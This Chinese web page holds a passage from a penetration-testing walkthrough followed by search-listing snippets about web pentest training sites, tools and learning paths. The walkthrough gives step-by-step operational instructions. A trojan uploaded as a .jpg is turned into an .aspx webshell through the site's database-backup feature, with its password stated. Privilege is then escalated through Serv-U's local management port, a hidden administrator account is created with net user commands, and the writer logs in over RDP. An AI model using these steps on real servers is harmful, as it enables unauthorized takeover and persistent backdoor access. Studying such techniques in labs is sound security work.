    我们上传成功后,因为上传的是图片,不能解析成木马脚本,正好我们这个网站有备份数据库功能,我们可以通过数据备份的方式,重新命名脚本文件,使其能够作为木马脚本被执行。我们点击左侧的数据管理,选择备份/恢复数据库

    在备份数据库中,数据库路径后面,填上我们刚刚上传图片的地址:../admin/Upfiles/201873091139.jpg;在备份的数据库路径后面填写../db/1.aspx。这样做的目的是把我们上传的jpg后缀的木马,重新备份成aspx文件,使我们的木马能够正常运行。

    我们点击备份后,访问http://192.168.1.3/db/1.aspx就是我们的木马地址了,木马的密码是77169,至此,我们就拿到了这个网站的webshell

    6.拿到服务器权限

    进入webshell后,我们需要执行dos命令来添加管理员。点击webshell上端的命令行,进入执行命令模式

    尝试执行whoami命令,查看下我们是什么权限

    我们发现回显的是network service权限,在此权限下是不能直接添加管理员账户的,我们添加账户时,回显是空白,证明我们无法添加用户

    点击端口扫描,再点击扫描,发现系统开放着43958端口,即server-u服务

    43958端口 是什么

    这是Serv-U的本地管理端口,只允许127.0.0.1连接

    点击SU提权,在cmdshell中输入命令net user aaa 123456 /add,然后点击执行

    在cmdshell中输入命令net localgroup administrators aaa /add,然后点击执行

    在cmdshell中输入命令net user,然后点击执行,查看aaa用户是否添加成功

    在cmdshell中输入命令net user aaa,然后点击执行,查看aaa用户属于administrators用户组

    点击开始->运行->mstsc->192.168.1.3->输入账号aaa和密码123456,点击登录

    展开全文
  • WEB渗透测试在线网站

    2019-01-14 17:07:15
    web渗透测试在线网站 国外 1、bWAPP 免费和开源的web应用程序安全项目。它有助于安全爱好者及研究人员发现和防止web漏洞。 地址:http://www.itsecgames.com/ 2、Damn Vulnerable iOS App (DVIA) DVIA是一个iOS安全...
  • Web渗透测试

    2019-09-29 20:04:57
    web渗透测试简介  渗透测试没用具体的定义,通常是指通过模拟黑客恶意的攻击方法,来评估计算机网络系统安全的一种评估方法。常见的渗透测试有App渗透测试,内网渗透测试,而Web渗透测试只是针对Web应用的渗透测试...
  • web渗透测试思路

    千次阅读 2017-04-20 14:27:40
    1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多!...
  • 这个系列是拜读《Web安全攻防:渗透测试实战指南》之后的一些笔记和实践记录,感谢作者对我学习过程的帮助,这本书值得大家入手学习。 信息收集 1.获取真实IP 2.域名信息 1.Whois查询 Kali自带了Whois,但是...
  • 原书:Kali Linux Web Penetration Testing Cookbook译者:飞龙 在线阅读 PDF格式 EPUB格式 MOBI格式 Github Git@OSC 赞助我协议CC BY-NC-SA 4.0
  • 最全渗透测试工具讲解

    千人学习 2019-06-25 11:17:04
    渗透测试工具详解视频教程,该课程分为三个部分,1、针对web扫描工具介绍,2、针对抓包工具介绍,3、针对信息探测介绍。(没章节都会将该章节介绍的工具共享给大家)这三部分基本涵盖了渗透测试中百分之80常见工具的...
  • web渗透测试

    千人学习 2019-06-25 11:35:51
    Web渗透测试教程,该课程侧重于讲解Web安全,并通过实验详细分析常见的十种Web漏洞、漏洞利用过程等。
  • WEB网站渗透测试方案

    千次阅读 2013-01-06 23:32:44
    WEB网站渗透测试方案 1 一、 Web网站渗透测试概述 1 1.1概述 2 1.2渗透测试对象 3 1.3现场安排 4 二、 Web网站渗透测试技术 4 2.1网络设备探测 4 2.2主机系统漏洞扫描 6 2.3Web平台安全性扫描 8 2.4数据库...
  • web渗透测试在线网站

    万次阅读 多人点赞 2018-06-21 16:29:14
    国外1、bWAPP免费和开源的web应用程序安全项目。...它的主要目标给移动安全爱好者学习iOS的渗透测试技巧提供一个合法的平台。APP涵盖了所有常见的iOS安全漏洞,它免费并开放源码,漏洞测试和解决...
  • 常见渗透测试靶场系统

    万次阅读 2016-09-09 10:52:39
    DVWA是用PHP+Mysql编写的一套用于常规WEB漏洞教学和检测的WEB脆弱性测试程序。包含了SQL注入、XSS、盲注等常见的一些安全漏洞。 链接地址:http://www.dvwa.co.uk mutillidaemutillidae mutillidaemutillidae是...
  • WEB渗透测试工程师需要具备的技能

    千次阅读 2019-05-01 00:44:02
  • 渗透测试的8个步骤—转载

    万次阅读 多人点赞 2017-10-31 09:35:35
    渗透测试的8个步骤 展现一次完整的渗透测试过程及思路 发布时间:2017年10月25日 15:11 浏览量:1104  渗透测试这个事情不是随便拿个工具就可以做了, 要了解业务还需要给出解决方案 。之前安全加介绍了...
  • 个人网络安全学习路线规划

    千次阅读 多人点赞 2018-10-27 20:22:19
    第一阶段 基础理论学习篇 安全理论知识 安全法律法规 操作系统应用 计算机网络 ...amp;...渗透测试方法学习 渗透测试基础知识 渗透测试环境搭建 渗透测试工具使用 信息收集与社工技巧 we...
  • 常见的Web渗透测试工具

    千次阅读 2018-02-01 16:53:38
    一、渗透测试工具nmap,查看网站服务器开放的端口 1、查看服务器上运行的服务 $ nmap -sV hack-test.com 2、查看操作系统版本 $ nmap -O hack-test.com 二、使用Nikto来收集漏洞信息 #官方网站:...
  • 渗透测试(Penetration Testing),也称为Pen Testing,是测试计算机系统、网络或Web应用程序以发现攻击者可能利用的安全漏洞的实践。渗透测试可以通过软件应用自动化或手动执行。无论哪种方式,该过程都包括在测试...
  • 搭建一个web渗透测试平台,对于学web渗透的初学者来说是一个不错的选择。(笔者也是一个初学者) 我看了网上前辈的环境搭建教程,都是基于XAMPP搭建,发现没有基于phpStudy。 phpStudy和XAMPP相比,phpStudy的功能更...
1 2 3 4 5 ... 20
收藏数 19,858
精华内容 7,943
关键字:

web渗透测试